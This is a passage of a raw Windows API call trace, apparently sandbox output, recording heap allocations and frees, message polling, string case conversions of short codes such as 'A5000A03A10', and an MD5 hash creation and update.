(in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.148] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.149] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.149] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.149] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.150] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.150] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.150] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.150] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.150] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.151] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.151] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.151] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.152] CryptCreateHash (in: hProv=0xad2a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0209.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.153] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0209.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0209.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.155] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.155] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.156] CryptHashData (hHash=0xaa5760, pbData=0x24b1828, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0209.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.159] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.160] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.160] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.160] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.161] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, 